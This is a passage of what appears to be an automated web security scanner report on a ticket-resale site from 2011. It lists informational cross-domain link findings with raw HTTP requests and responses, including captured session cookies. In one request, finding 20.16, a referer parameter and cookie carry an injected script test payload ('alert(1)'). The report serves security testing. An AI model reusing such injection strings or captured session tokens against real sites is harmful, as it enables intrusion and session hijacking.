cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIrw6CCTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZOqLDEJcco%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8zWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2Q8WPAukQSZAjAQylAJVnJjhhjBaomrW2mOKWzKtKgBkPYQDcyS69WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoBh6QSkAZKwk0COxhNE5Bm4rg4HcwHJwtGYDpRArLl9MtxuzSAdx%2B17PH%2BUoIvuGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHIuhNkLzo0gsxX2t%2BN2rH%2F%2BXrya3azP4tbs%2FSUdn2Qabkk5wy24JYXVLPG6SVgNT8nh%2FSUfr%2BackzOBAWkKDkAGxeTvhKMqqJoJVx5kAIbfOsL5P0w4A19aeoNHcgM%2FYQe6WS%2FEbYKb9SLckqE9M%2FHpXI1bMky4El%2BiOkqMq7fjM%2BEwbsl4lt34HFaAWzLR8hzhakV%2BBh8xRboU3mQWz7KHiMpDtZKwotT7soTdrHAJT3h5vbiObAI2axgYuFonUatAClRRwlNEqyjjllRcVkc4QGT%2B7yesKFBFG2%2F8eL24gTtTe724hVtSWcABX7p9hiczr%2F9PjMMN8DSL1IhoFinsv4bbBL6Kt9SKZv%2F8F3hictZNwn4FAEhKFMU%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 213
Connection: close

<html><body><div>
<script src="http://ib.adnxs.com/seg?add=153795&t=1" type="text/javascript"></script>

</div><
...[SNIP]...

20.15. http://bing.fansnap.com/checkout/clickout/415814268 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/clickout/415814268

Issue detail

The page was loaded from a URL containing a query string:

http://bing.fansnap.com/checkout/clickout/415814268?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv

The response contains the following link to another domain:

http://rover.ebay.com/rover/1/711-53200-19255-0/1?type=2&campid=5336216552&customid=1061888771&item=120749940240&ext=120749940240

Request

Response

20.16. http://bing.fansnap.com/checkout/clickout/418563179 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/clickout/418563179

Issue detail

The page was loaded from a URL containing a query string:

http://bing.fansnap.com/checkout/clickout/418563179?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2

The response contains the following link to another domain:

http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=862059306

Request

GET /checkout/clickout/418563179?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2 HTTP/1.1
Host: bing.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966945f62%27%3balert(1)//460f48c4516
Cookie: ver=1; vid=1342567440282625; tvid=1342567440282625; _fancat_session=BAh7DzoPc2Vzc2lvbl9pZCIlYWU1YjVlMDMzMzExOTFjZmJhMjBkMmQxNWNlMjllZGE6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgHOaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvYWpheF92ZXJpZnlfYXZhaWxhYmlsaXR5P3RpY2tldF9zZXRfaWQ9NDE4NTYzMTc5Jm5vbG89dHJ1ZSZwcmljZT02MiZjaD1iaW5nJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJnF1YW50aXR5PTIGOgZFRjoPYmdfcmVmZXJlciICTgFodHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTg1NjMxNzk%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDElM0JscG9zJTNEMiZjaD1iaW5nJnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzRDAuMDM3NCUzQiZhZm09JnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzeiUzQTEyNTQlM0JpZCUzQTM4OTY2OTQ1ZjYyJTI3JTNiYWxlcnQoMSkvLzQ2MGY0OGM0NTE2OhBiZ192aXNpdF9pZGkElMZhFjoSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToRYmdfc3R5bGVfaWRzSSIABjsIRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAOSSIRcHJwNDE4NTYzMTc5BjsIRkkiCTU4LjAGOwhGOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNc9obgBh%2B8JYGOgtvZmZzZXRp%2FpCd--8543264511d876e3c1d66e716e5849ffcab6d788; __utma=19633071.1263508421.1311101027.1311101027.1311104052.2; __utmc=19633071; __utmz=19633071.1311104052.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; lvd=1311101038; POOLID=B; __utmb=19633071; bg_ver=1; bg_vid=1342567440282625; bg_lvd=1311104266

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 19:37:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Cache-Control: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 38
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlYWU1YjVlMDMzMzExOTFjZmJhMjBkMmQxNWNlMjllZGE6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgHOaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvYWpheF92ZXJpZnlfYXZhaWxhYmlsaXR5P3RpY2tldF9zZXRfaWQ9NDE4NTYzMTc5Jm5vbG89dHJ1ZSZwcmljZT02MiZjaD1iaW5nJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJnF1YW50aXR5PTIGOgZFRjoPYmdfcmVmZXJlciICTgFodHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTg1NjMxNzk%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDElM0JscG9zJTNEMiZjaD1iaW5nJnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzRDAuMDM3NCUzQiZhZm09JnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzeiUzQTEyNTQlM0JpZCUzQTM4OTY2OTQ1ZjYyJTI3JTNiYWxlcnQoMSkvLzQ2MGY0OGM0NTE2OhBiZ192aXNpdF9pZGkElMZhFjoSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToRYmdfc3R5bGVfaWRzSSIABjsIRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAOOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNc9obgIsPZpcGOgtvZmZzZXRp%2FpCd--e286a72fc7d3fcd8ad684c8137e15e005a897918; domain=fansnap.com; path=/; HttpOnly
Location: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=862059306
Status: 302
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=862059306">redirected</a>.</body></html>

20.17. http://bing.fansnap.com/checkout/clickout/418563179 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/clickout/418563179

Issue detail

The page was loaded from a URL containing a query string:

http://bing.fansnap.com/checkout/clickout/418563179?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2

The response contains the following link to another domain:

http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=65260005

Request

Response

20.18. http://bing.fansnap.com/checkout/index/415814268 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Issue detail

The page was loaded from a URL containing a query string:

http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669

The response contains the following links to other domains:

http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif?REL-fansnap-1.20.2-r31787
http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787
http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787
http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "912210bf9f97f8eae912bcb4828410b5"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BH%2FkqNBjoLb2Zmc2V0af6QnQ%3D%3D--976c30f9ab045a1cfd33499b88aa515a33432d71; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11824
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</title>
<link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" />

<!--[if lte IE 6]>
...[SNIP]...
<div class='broker-img'>
<img alt="Provider-large-549" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
</script>
<script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
<a class='fsAuthClose'>
<img alt="Cancel" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...

20.19. http://bing.fansnap.com/checkout/index/418563179 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Issue detail

The page was loaded from a URL containing a query string:

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669

The response contains the following links to other domains:

http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787
http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787
http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787
http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 22
ETag: "a77815d5d483b7d39d35206e9af3772a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CWdhqOBjoLb2Zmc2V0af6QnQ%3D%3D--8f0f6d1603aea2d08c675430159ed90f71b0f19d; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11810
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</title>
<link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" />

<!--[if lte IE 6]>
...[SNIP]...
<div class='broker-img'>
<img alt="Provider-large-511" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
</script>
<script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
<a class='fsAuthClose'>
<img alt="Cancel" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...

20.20. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

Issue detail

The page was loaded from a URL containing a query string:

http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html

The response contains the following links to other domains:

http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787
http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron2.gif?REL-fansnap-1.20.2-r31787
http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787
http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787
http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787
http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787
http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif?REL-fansnap-1.20.2-r31787
